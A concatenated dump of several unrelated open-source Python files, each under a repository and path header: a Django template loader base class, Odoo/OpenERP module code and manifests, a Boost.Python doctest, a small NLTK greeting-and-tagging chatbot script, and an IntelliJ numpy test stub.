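#           self.assertTrue(os.path.exists(path))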
|
Trii/NoseGAE
|
refs/heads/master
|
examples/tests_in_package/helloworld/tests/__init__.py
|
1307
|
pass
|
jhoos/django
|
refs/heads/master
|
django/template/loaders/base.py
|
12
|
import warnings
from inspect import getargspec
from django.template import Origin, Template, TemplateDoesNotExist
from django.utils.deprecation import RemovedInDjango21Warning
class Loader(object):
# Only used to raise a deprecation warning. Remove in Django 2.0.
_accepts_engine_in_init = True
def __init__(self, engine):
self.engine = engine
def __call__(self, template_name, template_dirs=None):
# RemovedInDjango21Warning: Allow loaders to be called like functions.
return self.load_template(template_name, template_dirs)
def get_template(self, template_name, template_dirs=None, skip=None):
"""
Calls self.get_template_sources() and returns a Template object for
the first template matching template_name. If skip is provided,
template origins in skip are ignored. This is used to avoid recursion
during template extending.
"""
tried = []
args = [template_name]
# RemovedInDjango21Warning: Add template_dirs for compatibility with
# old loaders
if 'template_dirs' in getargspec(self.get_template_sources)[0]:
args.append(template_dirs)
for origin in self.get_template_sources(*args):
if skip is not None and origin in skip:
tried.append((origin, 'Skipped'))
continue
try:
contents = self.get_contents(origin)
except TemplateDoesNotExist:
tried.append((origin, 'Source does not exist'))
continue
else:
return Template(
contents, origin, origin.template_name, self.engine,
)
raise TemplateDoesNotExist(template_name, tried=tried)
def load_template(self, template_name, template_dirs=None):
warnings.warn(
'The load_template() method is deprecated. Use get_template() '
'instead.', RemovedInDjango21Warning,
)
source, display_name = self.load_template_source(
template_name, template_dirs,
)
origin = Origin(
name=display_name,
template_name=template_name,
loader=self,
)
try:
template = Template(source, origin, template_name, self.engine)
except TemplateDoesNotExist:
# If compiling the template we found raises TemplateDoesNotExist,
# back off to returning the source and display name for the
# template we were asked to load. This allows for correct
# identification of the actual template that does not exist.
return source, display_name
else:
return template, None
def get_template_sources(self, template_name):
"""
An iterator that yields possible matching template paths for a
template name.
"""
raise NotImplementedError(
'subclasses of Loader must provide a get_template_sources() method'
)
def load_template_source(self, template_name, template_dirs=None):
"""
RemovedInDjango21Warning: Returns a tuple containing the source and
origin for the given template name.
"""
raise NotImplementedError(
'subclasses of Loader must provide a load_template_source() method'
)
def reset(self):
"""
Resets any state maintained by the loader instance (e.g. cached
templates or cached loader modules).
"""
pass
@property
def supports_recursion(self):
"""
RemovedInDjango21Warning: This is an internal property used by the
ExtendsNode during the deprecation of non-recursive loaders.
"""
return hasattr(self, 'get_contents')
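# --- Illustrative sketch (not part of Django's source) ---
# A minimal concrete loader only needs get_template_sources() and
# get_contents(); the recursive get_template() above then works as-is and
# `supports_recursion` is True. `TEMPLATES` is a hypothetical in-memory
# mapping used for illustration:
#
#   TEMPLATES = {'index.html': '<h1>{{ title }}</h1>'}
#
#   class DictLoader(Loader):
#       def get_template_sources(self, template_name):
#           yield Origin(name=template_name, template_name=template_name,
#                        loader=self)
#
#       def get_contents(self, origin):
#           try:
#               return TEMPLATES[origin.template_name]
#           except KeyError:
#               raise TemplateDoesNotExist(origin)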
|
laslabs/geospatial
|
refs/heads/8.0
|
geoengine_project/models/project_project.py
|
5
|
# -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of geoengine_project,
# an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# geoengine_project is free software:
# you can redistribute it and/or modify it under the terms of the GNU
# Affero General Public License as published by the Free Software
# Foundation,either version 3 of the License, or (at your option) any
# later version.
#
# geoengine_project is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with geoengine_project.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.addons.base_geoengine import geo_model, fields
class ProjectProject(geo_model.GeoModel):
"""Add geo_point to project.project"""
_inherit = 'project.project'
geo_point = fields.GeoPoint(
'Addresses coordinate', related='partner_id.geo_point')
|
yinchunlong/abelkhan-1
|
refs/heads/master
|
ext/c++/thirdpart/c++/boost/libs/python/test/newtest.py
|
46
|
# Copyright David Abrahams 2004. Distributed under the Boost
# Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
"""
>>> from m1 import *
>>> from m2 import *
Prove that we get an appropriate error from trying to return a type
for which we have no registered to_python converter
>>> def check_unregistered(f, msgprefix):
... try:
... f(1)
... except TypeError, x:
... if not str(x).startswith(msgprefix):
... print str(x)
... else:
... print 'expected a TypeError'
...
>>> check_unregistered(make_unregistered, 'No to_python (by-value) converter found for C++ type')
>>> check_unregistered(make_unregistered2, 'No Python class registered for C++ class')
>>> n = new_noddy()
>>> s = new_simple()
>>> unwrap_int(n)
42
>>> unwrap_int_ref(n)
42
>>> unwrap_int_const_ref(n)
42
>>> unwrap_simple(s)
'hello, world'
>>> unwrap_simple_ref(s)
'hello, world'
>>> unwrap_simple_const_ref(s)
'hello, world'
>>> unwrap_int(5)
5
Can't get a non-const reference to a built-in integer object
>>> try:
... unwrap_int_ref(7)
... except: pass
... else: print 'no exception'
>>> unwrap_int_const_ref(9)
9
>>> wrap_int(n)
42
>>> try: wrap_int_ref(n)
... except: pass
... else: print 'no exception'
>>> wrap_int_const_ref(n)
42
>>> unwrap_simple_ref(wrap_simple(s))
'hello, world'
>>> unwrap_simple_ref(wrap_simple_ref(s))
'hello, world'
>>> unwrap_simple_ref(wrap_simple_const_ref(s))
'hello, world'
>>> f(s)
12
>>> unwrap_simple(g(s))
'hello, world'
>>> f(g(s))
12
>>> f_mutable_ref(g(s))
12
>>> f_const_ptr(g(s))
12
>>> f_mutable_ptr(g(s))
12
>>> f2(g(s))
12
Create an extension class which wraps "complicated" (init1 and get_n
are a complicated constructor and member function, respectively).
>>> c1 = complicated(s, 99)
>>> c1.get_n()
99
>>> c2 = complicated(s)
>>> c2.get_n()
0
a quick regression test for a bug where None could be converted
to the target of any member function. To see it, we need to
access the __dict__ directly, to bypass the type check supplied
by the Method property which wraps the method when accessed as an
attribute.
>>> try: A.__dict__['name'](None)
... except TypeError: pass
... else: print 'expected an exception!'
>>> a = A()
>>> b = B()
>>> c = C()
>>> d = D()
>>> take_a(a).name()
'A'
>>> try:
... take_b(a)
... except: pass
... else: print 'no exception'
>>> try:
... take_c(a)
... except: pass
... else: print 'no exception'
>>> try:
... take_d(a)
... except: pass
... else: print 'no exception'
------
>>> take_a(b).name()
'A'
>>> take_b(b).name()
'B'
>>> try:
... take_c(b)
... except: pass
... else: print 'no exception'
>>> try:
... take_d(b)
... except: pass
... else: print 'no exception'
-------
>>> take_a(c).name()
'A'
>>> try:
... take_b(c)
... except: pass
... else: print 'no exception'
>>> take_c(c).name()
'C'
>>> try:
... take_d(c)
... except: pass
... else: print 'no exception'
-------
>>> take_a(d).name()
'A'
>>> take_b(d).name()
'B'
>>> take_c(d).name()
'C'
>>> take_d(d).name()
'D'
>>> take_d_shared_ptr(d).name()
'D'
>>> d_as_a = d_factory()
>>> dd = take_d(d_as_a)
>>> dd.name()
'D'
>>> print g.__doc__.splitlines()[1]
g( (Simple)arg1) -> Simple :
"""
def run(args = None):
import sys
import doctest
if args is not None:
sys.argv = args
return doctest.testmod(sys.modules.get(__name__))
if __name__ == '__main__':
print "running..."
import sys
status = run()[0]
if (status == 0): print "Done."
sys.exit(status)
|
shafaypro/PYSHA
|
refs/heads/master
|
Chatstuff/__chatcheck.py
|
2
|
import random
import textblob
from nltk.tokenize import *  # tokenizing the sentences on the basis of natural language processing
from textblob import *
from nltk.stem import PorterStemmer # importing the port stemmer for later purpose
from nltk.corpus import stopwords
from nltk.corpus import state_union # for importing the already stored data, to be trained with
from nltk.tokenize import PunktSentenceTokenizer # importing the already POS intelligent punkbuster tokenizer
import nltk
GREETING_KEYWORDS = ("hello", "hi", "greetings", "sup", "what's up",)
GREETING_RESPONSES = ["'sup bro", "hey", "*nods*", "hey you get my snap?"]
def check_for_greeting(sentence):
sentence = sentence.lower()
words = sentence.split(" ")
for word in words:
if word.lower() in GREETING_KEYWORDS:
return random.choice(GREETING_RESPONSES)
def parts_of_speechtag(sentences=""):
from nltk.corpus import state_union # for importing the already stored data, to be trained with
from nltk.tokenize import PunktSentenceTokenizer # importing the already POS intelligent punkbuster tokenizer
training_text = state_union.raw("2005-GWBUSH.txt") # Training set imported from the state union local repo.
sample_text = sentences
custom_sentence_tokenized = PunktSentenceTokenizer(train_text=training_text)
# This is the unsupervised learning
tokenization_unsupervised = custom_sentence_tokenized.tokenize(str(sample_text))
# tokenizing using unsupervised learning
# print(tokenization_unsupervised) # just for the debugging purposes
# print(type(tokenization_unsupervised)) # checking the type of the sentences
return processing_POS_tokenization(tokenization_unsupervised=tokenization_unsupervised)
def processing_POS_tokenization(tokenization_unsupervised):
tagged_sentences = []
for _ in tokenization_unsupervised:
words = word_tokenize(_)  # The current sentence is being tokenized into words
tagged_posts = nltk.pos_tag(words)
print(tagged_posts)
tagged_sentences.append(tagged_posts)
return tagged_sentences
def respond(sentences):
tokenized_sentence = sent_tokenize(sentences)
stop_words = set(stopwords.words("english")) # Getting the stop words from the Local DB
if len(tokenized_sentence) > 1: # if the length of the tokenized sentence is greater than one
# for sentence in tokenized_sentence:
# words = word_tokenize(sentence) # Each word is tokenized
pos_tagged = parts_of_speechtag(sentences)
print(tuple(pos_tagged))
# filtered_words = [w for w in words if w not in stop_words] # removing the additional stop words for
# portStemer_object = PorterStemmer()
# filtered_steam_words = [portStemer_object.stem(w) for w in filtered_words]
# return filtered_steam_words
else:
pos_tagged = parts_of_speechtag(sentences)
print(type(pos_tagged))
# words = word_tokenize(sentences)
# filtered_words = [w for w in words if w not in stop_words]
# portStemer_object = PorterStemmer()
# filtered_steam_words = [portStemer_object.stem(w) for w in filtered_words]
#return filtered_steam_words
print(respond(input()))
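# --- Illustrative sketch (not part of the original module) ---
#   check_for_greeting("hello there")  # -> a random GREETING_RESPONSES entry
#   parts_of_speechtag("Time flies like an arrow.")  # prints POS-tagged words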
|
alphafoobar/intellij-community
|
refs/heads/master
|
python/testData/inspections/PyNumpyType/Vectorize.py
|
79
|
class vectorize(object):
"""
vectorize(pyfunc, otypes='', doc=None, excluded=None, cache=False)
Generalized function class.
Define a vectorized function which takes a nested sequence
of objects or numpy arrays as inputs and returns a
numpy array as output. The vectorized function evaluates `pyfunc` over
successive tuples of the input arrays like the python map function,
except it uses the broadcasting rules of numpy.
The data type of the output of `vectorized` is determined by calling
the function with the first element of the input. This can be avoided
by specifying the `otypes` argument.
Parameters
----------
pyfunc : callable
A python function or method.
otypes : str or list of dtypes, optional
The output data type. It must be specified as either a string of
typecode characters or a list of data type specifiers. There should
be one data type specifier for each output.
doc : str, optional
The docstring for the function. If `None`, the docstring will be the
``pyfunc.__doc__``.
excluded : set, optional
Set of strings or integers representing the positional or keyword
arguments for which the function will not be vectorized. These will be
passed directly to `pyfunc` unmodified.
.. versionadded:: 1.7.0
cache : bool, optional
If `True`, then cache the first function call that determines the number
of outputs if `otypes` is not provided.
.. versionadded:: 1.7.0
Returns
-------
vectorized : callable
Vectorized function.
Examples
--------
>>> def myfunc(a, b):
... "Return a-b if a>b, otherwise return a+b"
... if a > b:
... return a - b
... else:
... return a + b
>>> vfunc = np.vectorize(myfunc)
>>> vfunc([1, 2, 3, 4], 2)
array([3, 4, 1, 2])
The docstring is taken from the input function to `vectorize` unless it
is specified
>>> vfunc.__doc__
'Return a-b if a>b, otherwise return a+b'
>>> vfunc = np.vectorize(myfunc, doc='Vectorized `myfunc`')
>>> vfunc.__doc__
'Vectorized `myfunc`'
The output type is determined by evaluating the first element of the input,
unless it is specified
>>> out = vfunc([1, 2, 3, 4], 2)
>>> type(out[0])
<type 'numpy.int32'>
>>> vfunc = np.vectorize(myfunc, otypes=[np.float])
>>> out = vfunc([1, 2, 3, 4], 2)
>>> type(out[0])
<type 'numpy.float64'>
The `excluded` argument can be used to prevent vectorizing over certain
arguments. This can be useful for array-like arguments of a fixed length
such as the coefficients for a polynomial as in `polyval`:
>>> def mypolyval(p, x):
... _p = list(p)
... res = _p.pop(0)
... while _p:
... res = res*x + _p.pop(0)
... return res
>>> vpolyval = np.vectorize(mypolyval, excluded=['p'])
>>> vpolyval(p=[1, 2, 3], x=[0, 1])
array([3, 6])
Positional arguments may also be excluded by specifying their position:
>>> vpolyval.excluded.add(0)
>>> vpolyval([1, 2, 3], x=[0, 1])
array([3, 6])
Notes
-----
The `vectorize` function is provided primarily for convenience, not for
performance. The implementation is essentially a for loop.
If `otypes` is not specified, then a call to the function with the
first argument will be used to determine the number of outputs. The
results of this call will be cached if `cache` is `True` to prevent
calling the function twice. However, to implement the cache, the
original function must be wrapped which will slow down subsequent
calls, so only do this if your function is expensive.
The new keyword argument interface and `excluded` argument support
further degrades performance.
"""
def __init__(self, pyfunc, otypes='', doc=None, excluded=None,
cache=False):
pass
def mypolyval(): pass
vpolyval = vectorize(mypolyval, excluded=['p'])
|
tsabi/Odoo-tsabi-fixes
|
refs/heads/master
|
addons/marketing_campaign/__openerp__.py
|
67
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Marketing Campaigns',
'version': '1.1',
'depends': ['marketing',
'document',
'email_template',
'decimal_precision'
],
'author': 'OpenERP SA',
'category': 'Marketing',
'description': """
This module provides leads automation through marketing campaigns (campaigns can in fact be defined on any resource, not just CRM Leads).
=========================================================================================================================================
The campaigns are dynamic and multi-channels. The process is as follows:
------------------------------------------------------------------------
* Design marketing campaigns like workflows, including email templates to
send, reports to print and send by email, custom actions
* Define input segments that will select the items that should enter the
campaign (e.g. leads from certain countries).
* Run your campaign in simulation mode to test it in real time or accelerated,
and fine-tune it
* You may also start the real campaign in manual mode, where each action
requires manual validation
* Finally launch your campaign live, and watch the statistics as the
campaign does everything fully automatically.
While the campaign runs you can of course continue to fine-tune the parameters,
input segments, and workflow.
**Note:** If you need demo data, you can install the marketing_campaign_crm_demo
module, but this will also install the CRM application as it depends on
CRM Leads.
""",
'website': 'http://www.openerp.com',
'data': [
'marketing_campaign_view.xml',
'marketing_campaign_data.xml',
'marketing_campaign_workflow.xml',
'report/campaign_analysis_view.xml',
'security/marketing_campaign_security.xml',
'security/ir.model.access.csv'
],
'demo': ['marketing_campaign_demo.xml'],
'test': ['test/marketing_campaign.yml'],
'installable': True,
'auto_install': False,
'images': ['images/campaign.png', 'images/campaigns.jpeg','images/email_account.jpeg','images/email_templates.jpeg','images/segments.jpeg'],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|